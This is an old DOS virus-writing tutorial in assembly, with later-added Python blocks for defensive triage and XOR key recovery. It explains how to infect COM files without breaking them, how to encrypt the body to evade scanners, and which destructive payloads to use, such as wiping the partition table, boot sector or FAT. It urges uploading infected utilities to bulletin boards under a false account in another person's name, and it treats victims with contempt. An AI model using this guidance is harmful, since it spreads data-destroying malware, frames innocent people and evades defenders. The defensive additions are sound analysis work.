assembly language coded virus supri (supreme v1)
VIRUS ARE WONDROUS CREATIONS WRITTEN FOR THE SOLE
PURPOSE OF SPREADING AND DESTROYING THE SYSTEMS OF
UNSUSPECTING FOOLS. THIS ELIMINATES THE SYSTEMS OF
SIMPLETONS WHO CAN'T TELL THAT THERE IS A PROBLEM
WHEN A 100 BYTE FILE SUDDENLY BLOSSOMS INTO A 1,000
BYTE FILE. DUH. THESE LOW-LIFES DO NOT DESERVE TO EXIST,
SO IT IS OUR SACRED DUTY TO WIPE THEIR HARD DRIVES OFF
THE FACE OF THE EARTH. IT IS A SIMPLE MATTER OF SPEEDING
ALONG SURVIVAL OF THE FITTEST.
THERE ARE THREE TYPES OF VIRUS:
1) TINY VIRUS (UNDER 500 BYTES) WHICH ARE DESIGNED TO BE
UNDETECTABLE DUE TO THEIR SMALL SIZE. TINY IS ONE SUCH VIRUS. THEY
ARE GENERALLY VERY SIMPLE BECAUSE THEIR CODE LENGTH IS SO LIMITED.
2) LARGE VIRUS (OVER 1,500 BYTES) WHICH ARE DESIGNED TO BE
UNDETECTABLE BECAUSE THEY COVER THEIR TRACKS VERY WELL (ALL THAT
CODE DOES HAVE A USE!). THE BEST EXAMPLE OF THIS IS THE WHALE VIRUS,
WHICH IS PERHAPS THE BEST 'STEALTH' VIRUS IN EXISTENCE.
3) OTHER VIRUS WHICH ARE NOT DESIGNED TO BE HIDDEN AT ALL (THE
WRITERS DON'T GIVE A SHIT). THE COMMON VIRUS IS LIKE THIS. ALL
OVERWRITING VIRUS ARE IN THIS CATEGORY.
PARTS OF A VIRUS
A VIRUS MAY BE DIVIDED INTO THREE PARTS: THE REPLICATOR,
THE CONCEALER, AND THE BOMB. THE REPLICATOR PART
CONTROLS THE SPREAD OF THE VIRUS TO OTHER FILES, THE
CONCEALER KEEPS THE VIRUS FROM BEING DETECTED, AND
THE BOMB ONLY EXECUTES WHEN THE ACTIVATION CONDITIONS
OF THE VIRUS (MORE ON THAT LATER) ARE SATISFIED.
THE REPLICATOR
THE JOB OF THE REPLICATOR IS TO SPREAD THE VIRUS THROUGHOUT THE
SYSTEM OF THE CLOD WHO HAS CAUGHT THE VIRUS. HOW DOES IT DO THIS
WITHOUT DESTROYING THE FILE IT INFECTS? THE EASIEST TYPE OF
REPLICATOR INFECTS COM FILES. IT FIRST SAVES THE FIRST FEW BYTES OF
THE INFECTED FILE. IT THEN COPIES A SMALL PORTION OF ITS CODE TO THE
BEGINNING OF THE FILE, AND THE REST TO THE END.
THE UNINFECTED FILE:        THE VIRUS CODE:
| P1 | P2 |                 | V1 | V2 |
IN THE DIAGRAM, P1 IS PART 1 OF THE FILE, P2 IS PART 2 OF THE FILE, AND
V1 AND V2 ARE PARTS 1 AND 2 OF THE VIRUS. NOTE THAT THE SIZE OF P1
SHOULD BE THE SAME AS THE SIZE OF V1, BUT THE SIZE OF P2 DOESN'T
NECESSARILY HAVE TO BE THE SAME SIZE AS V2. THE VIRUS FIRST SAVES P1
AND COPIES IT TO EITHER 1) THE END OF THE FILE OR 2) INSIDE THE
CODE OF THE VIRUS. LET'S ASSUME IT COPIES THE CODE TO THE END OF THE
FILE. THE FILE NOW LOOKS LIKE:
| P1 | P2 | P1 |
THEN, THE VIRUS COPIES THE FIRST PART OF ITSELF TO THE
BEGINNING OF THE FILE:
| V1 | P2 | P1 |
FINALLY, THE VIRUS COPIES THE SECOND PART OF ITSELF TO
THE END OF THE FILE. THE FINAL, INFECTED FILE LOOKS LIKE
THIS:
| V1 | P2 | P1 | V2 |
THE QUESTION IS: WHAT DO V1 AND V2 DO? V1
TRANSFERS CONTROL OF THE PROGRAM TO V2. THE CODE TO
DO THIS IS SIMPLE.
    JMP FAR PTR DUH     ; TAKES FOUR BYTES
DUH DW V2_START         ; TAKES TWO BYTES
DUH IS A FAR POINTER (SEGMENT:OFFSET) POINTING TO THE FIRST
INSTRUCTION OF V2. NOTE THAT THE VALUE OF DUH MUST BE CHANGED TO
REFLECT THE LENGTH OF THE FILE THAT IS INFECTED. FOR EXAMPLE, IF THE
ORIGINAL SIZE OF THE PROGRAM IS 79 BYTES, DUH MUST BE CHANGED SO
THAT THE INSTRUCTION AT CS:[155H] IS EXECUTED. THE VALUE OF DUH IS
OBTAINED BY ADDING THE LENGTH OF V1, THE ORIGINAL SIZE OF THE
INFECTED FILE, AND 256 (TO ACCOUNT FOR THE PSP). IN THIS CASE, V1 = 6
AND P1 + P2 = 79, SO 6 + 79 + 256 = 341 DECIMAL (155 HEX).
V2 CONTAINS THE REST OF THE CODE, I.E. THE STUFF THAT DOES
EVERYTHING ELSE. THE LAST PART OF V2 COPIES P1 OVER V1 (IN
MEMORY, NOT ON DISK) AND THEN TRANSFERS CONTROL TO THE
BEGINNING OF THE FILE (IN MEMORY). THE ORIGINAL PROGRAM WILL
THEN RUN HAPPILY AS IF NOTHING HAPPENED. THE CODE TO DO THIS
IS ALSO VERY SIMPLE.
    MOV SI, V2_START    ; V2_START IS A LABEL MARKING WHERE V2 STARTS
    SUB SI, V1_LENGTH   ; GO BACK TO WHERE P1 IS STORED
    MOV DI, 0100H       ; ALL COM FILES ARE LOADED @ CS:[100H] IN MEMORY
    MOV CX, V1_LENGTH   ; MOVE CX BYTES
    REP MOVSB           ; DS:[SI] -> ES:[DI]
    MOV DI, 0100H
    JMP DI
THIS CODE ASSUMES THAT P1 IS LOCATED JUST BEFORE V2, AS IN:
P1_STORED_HERE:
.
.
.
V2_START:
IT ALSO ASSUMES ES EQUALS CS. IF THESE ASSUMPTIONS ARE FALSE,
CHANGE THE CODE ACCORDINGLY. HERE IS AN EXAMPLE:
    PUSH CS             ; STORE CS
    POP ES              ; AND MOVE IT TO ES; NOTE MOV ES, CS IS NOT A VALID INSTRUCTION
    MOV SI, P1_START    ; MOVE FROM WHERE EVER P1 IS STORED
    MOV DI, 0100H       ; TO CS:[100H]
    MOV CX, V1_LENGTH
    REP MOVSB
    MOV DI, 0100H
    JMP DI
V1_START:
    JMP FAR PTR DUH
DUH DW V2_START
V1_END:
P2_START:
P2_END:
P1_START:
; FIRST PART OF THE PROGRAM STORED HERE FOR FUTURE USE
P1_END:
V2_START:
; REAL STUFF
V2_END:
V1_LENGTH EQU V1_END - V1_START
THAT'S ALL THERE IS TO INFECTING A COM FILE WITHOUT DESTROYING IT!
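AS AN ADDED EXAMPLE (NOT FROM THE ORIGINAL TEXT), HERE IS THE DEFENDER'S SIDE OF THE SAME ARITHMETIC: A COM IMAGE LOADS AT CS:100H, SO AN ENTRY JMP WHOSE TARGET MINUS 100H POINTS AT THE TAIL OF THE FILE IS THE | V1 | P2 | P1 | V2 | LAYOUT ABOVE. IT ASSUMES A 3-BYTE NEAR JMP FOR V1 (SO THE CONSTRUCTED 79-BYTE SAMPLE JUMPS TO 152H RATHER THAN THE 155H COMPUTED ABOVE FOR A 6-BYTE V1) AND A TUNABLE 50% TAIL THRESHOLD.

```python
"""Triage of DOS .COM images for the appended-infector layout described
above: the entry point is a JMP whose target lies deep inside the file,
where the appended body (V2) was written.  Example code added here, not
part of the original text."""

COM_LOAD_OFFSET = 0x100  # COM images load at CS:0100h, right after the PSP


def entry_jump_target(image: bytes):
    """CS-relative target of a direct JMP at the entry point, or None.
    E9 rel16 is a near jump relative to the next instruction;
    EA off16:seg16 is a direct far jump (only the offset is used here)."""
    if len(image) >= 3 and image[0] == 0xE9:
        rel = int.from_bytes(image[1:3], "little", signed=True)
        return COM_LOAD_OFFSET + 3 + rel
    if len(image) >= 5 and image[0] == 0xEA:
        return int.from_bytes(image[1:3], "little")
    return None


def triage_com(image: bytes, tail_fraction: float = 0.5) -> dict:
    """Flag an image whose entry JMP lands in the last part of the file.
    tail_fraction is a tunable assumption, not a fixed industry constant."""
    target = entry_jump_target(image)
    result = {"target": target, "file_offset": None, "tail_len": 0,
              "suspicious": False, "reason": "no direct jump at entry"}
    if target is None:
        return result
    file_off = target - COM_LOAD_OFFSET
    result["file_offset"] = file_off
    if file_off < 0 or file_off >= len(image):
        result.update(suspicious=True,
                      reason="entry jump leaves the image: corrupt or truncated")
        return result
    result["tail_len"] = len(image) - file_off
    if file_off >= tail_fraction * len(image):
        result.update(suspicious=True,
                      reason=f"entry jumps to offset {file_off} of {len(image)}:"
                             " code appended after the original body")
    else:
        result["reason"] = "entry jump lands early (e.g. skipping a data area)"
    return result


def build_sample_infected(orig_size: int = 79, appended_len: int = 40) -> bytes:
    """Constructed image in the page's layout V1 | P2 | P1 | V2, with a
    3-byte near JMP as V1 and NOP filler standing in for real code."""
    v1_len = 3
    v1 = bytes([0xE9]) + orig_size.to_bytes(2, "little")  # -> 0x100 + 3 + orig_size
    return v1 + b"\x90" * (orig_size - v1_len) + b"\x90" * v1_len + b"\x90" * appended_len
```

A LEGITIMATE PROGRAM THAT OPENS WITH A JMP OVER A DATA AREA LANDS EARLY AND IS NOT FLAGGED; ANY HIT STILL NEEDS A LOOK AT THE TAIL BYTES BEFORE IT IS CALLED AN INFECTION.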
THE CONCEALER
THIS IS THE PART WHICH CONCEALS THE PROGRAM FROM NOTICE BY THE
EVERYDAY USER AND VIRUS SCANNER. THE SIMPLEST FORM OF
CONCEALMENT IS THE ENCRYPTOR. THE CODE FOR A SIMPLE XOR
ENCRYPTION SYSTEM FOLLOWS:
ENCRYPT_VAL DB ?
DECRYPT:
ENCRYPT:
    MOV AH, ENCRYPT_VAL
    MOV CX, PART_TO_ENCRYPT_END - PART_TO_ENCRYPT_START
    MOV SI, PART_TO_ENCRYPT_START
    MOV DI, SI
XOR_LOOP:
    LODSB               ; DS:[SI] -> AL
    XOR AL, AH
    STOSB               ; AL -> ES:[DI]
    LOOP XOR_LOOP
    RET
NOTE THE ENCRYPTION AND DECRYPTION PROCEDURES ARE THE SAME. THIS
IS DUE TO THE WEIRD NATURE OF XOR. YOU CAN CALL THESE PROCEDURES
FROM ANYWHERE IN THE PROGRAM, BUT MAKE SURE YOU DO NOT CALL THEM
FROM A PLACE WITHIN THE AREA TO BE ENCRYPTED, AS THE PROGRAM
WILL CRASH. WHEN WRITING THE VIRUS, SET THE ENCRYPTION VALUE TO 0.
PART_TO_ENCRYPT_START AND PART_TO_ENCRYPT_END SANDWICH THE
AREA YOU WISH TO ENCRYPT. USE A CALL DECRYPT IN THE BEGINNING OF V2
TO UNENCRYPT THE FILE SO YOUR PROGRAM CAN RUN. WHEN INFECTING A
FILE, FIRST CHANGE THE ENCRYPT_VAL, THEN CALL ENCRYPT, THEN WRITE
V2 TO THE END OF THE FILE, AND CALL DECRYPT. MAKE SURE THIS PART
DOES NOT LIE IN THE AREA TO BE ENCRYPTED!!!
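AN ANALYSIS-SIDE COUNTERPART, ADDED HERE AS AN EXAMPLE AND NOT PART OF THE ORIGINAL TEXT: BECAUSE SINGLE-BYTE XOR IS ITS OWN INVERSE, ENCRYPT_VAL CAN BE RECOVERED FROM AN ENCRYPTED BODY BY TRYING ALL 256 KEYS AND LOOKING FOR A FEW BYTES OF EXPECTED PLAINTEXT. THE CONSTRUCTED SAMPLE ASSUMES THE MOV DI, 0100H / JMP DI TAIL FROM THE REPLICATOR SECTION (BF 00 01 FF E7) SITS INSIDE THE ENCRYPTED AREA AND USES IT AS THAT KNOWN PLAINTEXT.

```python
"""Recovering a single-byte XOR key from a concealed body by known-plaintext
search.  Example code added here, not part of the original text."""


def xor_body(data: bytes, key: int) -> bytes:
    """Same operation as the page's ENCRYPT/DECRYPT loop: every byte XOR key."""
    return bytes(b ^ key for b in data)


def recover_key(encrypted: bytes, known_plaintext: bytes):
    """Return (key, offset) for the first key under which known_plaintext
    appears in the decrypted body, or None if no key fits.  Key 0 is tried
    too, since the text tells the writer to start with ENCRYPT_VAL = 0."""
    for key in range(256):
        pos = xor_body(encrypted, key).find(known_plaintext)
        if pos != -1:
            return key, pos
    return None


# Constructed sample: INT 3 filler around the 5-byte restore stub
# MOV DI, 0100H / JMP DI (BF 00 01 FF E7), then XOR-wrapped with 5Ah.
RESTORE_STUB = bytes.fromhex("bf0001ffe7")
SAMPLE_BODY = b"\xcc" * 12 + RESTORE_STUB + b"\xcc" * 7
SAMPLE_KEY = 0x5A
SAMPLE_ENCRYPTED = xor_body(SAMPLE_BODY, SAMPLE_KEY)
```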
THE BOMB
SO NOW ALL THE BORING STUFF IS OVER. THE NASTINESS IS CONTAINED
HERE. THE BOMB PART OF THE VIRUS DOES ALL THE
DELETION/SLOWDOWN/ETC WHICH MAKE VIRII SO ANNOYING. SET SOME
ACTIVATION CONDITIONS OF THE VIRUS. THIS CAN BE ANYTHING, RANGING
FROM WHEN IT'S YOUR BIRTHDAY TO WHEN THE VIRUS HAS INFECTED 100
FILES. WHEN THESE CONDITIONS ARE MET, THEN YOUR VIRUS DOES THE
GOOD STUFF. SOME SUGGESTIONS OF POSSIBLE BOMBS: 1) SYSTEM
SLOWDOWN - EASILY HANDLED BY TRAPPING AN INTERRUPT AND CAUSING A
DELAY WHEN IT ACTIVATES. 2) FILE DELETION - DELETE ALL ZIP FILES ON THE
DRIVE. 3) MESSAGE DISPLAY - DISPLAY A NICE MESSAGE SAYING SOMETHING
TO THE EFFECT OF "YOU ARE FUCKED." 4) KILLING/REPLACING THE
PARTITION TABLE/BOOT SECTOR/FAT OF THE HARD DRIVE - THIS IS VERY
NASTY, AS MOST DIMWITS CANNOT FIX THIS.
OFFSET PROBLEMS
THERE IS ONE CAVEAT REGARDING CALCULATION OF OFFSETS. AFTER YOU
INFECT A FILE, THE LOCATIONS OF VARIABLES CHANGE. YOU MUST ACCOUNT
FOR THIS. ALL RELATIVE OFFSETS CAN STAY THE SAME, BUT YOU MUST ADD
THE FILE SIZE TO THE ABSOLUTE OFFSETS OR YOUR PROGRAM WILL NOT
WORK. THIS IS THE MOST TRICKY PART OF WRITING VIRUS AND TAKING
THESE INTO ACCOUNT CAN OFTEN GREATLY INCREASE THE SIZE OF A VIRUS.
THIS IS VERY IMPORTANT AND YOU SHOULD BE SURE TO UNDERSTAND THIS
BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
TESTING
TESTING VIRII IS A DANGEROUS YET ESSENTIAL PART OF THE VIRUS
CREATION PROCESS. THIS IS TO MAKE CERTAIN THAT PEOPLE *WILL* BE HIT
BY THE VIRUS AND, HOPEFULLY, WIPED OUT. TEST THOROUGHLY AND MAKE
SURE IT ACTIVATES UNDER THE CONDITIONS. IT WOULD BE GREAT IF
EVERYONE HAD A SECOND COMPUTER TO TEST THEIR VIRII OUT, BUT, OF
COURSE, THIS IS NOT THE CASE. SO IT IS ESSENTIAL THAT YOU KEEP
BACKUPS OF YOUR FILES, PARTITION, BOOT RECORD, AND FAT. NORTON IS
HANDY FOR DOING THIS. DO NOT DISREGARD THIS ADVICE (EVEN THOUGH
I KNOW THAT YOU WILL ANYWAY) BECAUSE YOU WILL BE HIT BY YOUR OWN
VIRII. WHEN I WROTE MY FIRST VIRUS, MY SYSTEM WAS TAKEN DOWN FOR
TWO DAYS BECAUSE I DIDN'T HAVE GOOD BACKUPS. LUCKILY, THE VIRUS
WAS NOT OVERLY DESTRUCTIVE. BACKUPS MAKE SENSE! LEECH A BACKUP
PROGRAM FROM YOUR LOCAL PIRATE BOARD! I FIND A RAMDRIVE IS OFTEN
HELPFUL IN TESTING VIRII, AS THE DAMAGE IS NOT PERMANENT. RAMDRIVES
ARE ALSO USEFUL FOR TESTING TROJANS, BUT THAT IS THE TOPIC OF
ANOTHER FILE...
DISTRIBUTION
THIS IS ANOTHER FUN PART OF VIRUS WRITING. IT INVOLVES SENDING YOUR
BRILLIANTLY-WRITTEN PROGRAM THROUGH THE PHONE LINES TO YOUR
LOCAL, UNSUSPECTING BULLETIN BOARDS. WHAT YOU SHOULD DO IS INFECT
A FILE THAT ACTUALLY DOES SOMETHING (LEECH A USEFUL UTILITY FROM
ANOTHER BOARD), INFECT IT, AND UPLOAD IT TO A PLACE WHERE IT WILL BE
DOWNLOADED BY USERS ALL OVER. THE BEST THING IS THAT IT WON'T BE
DETECTED BY PUNY SCANNER-WANNA-BES BY MCAFEE, SINCE IT IS NEW!
OH YEAH, MAKE SURE YOU ARE USING A FALSE ACCOUNT (DUH). BETTER YET,
MAKE A FALSE ACCOUNT WITH THE NAME/PHONE NUMBER OF SOMEONE
YOU DON'T LIKE AND UPLOAD THE INFECTED FILE UNDER HIS NAME. YOU
CAN CALL BACK FROM TIME TO TIME AND USE A DOOR SUCH AS ZDOOR TO
CHECK THE SPREAD OF THE VIRUS. THE MORE WHO DOWNLOAD, THE MORE
WHO SHARE IN THE EXPERIENCE OF YOUR VIRUS!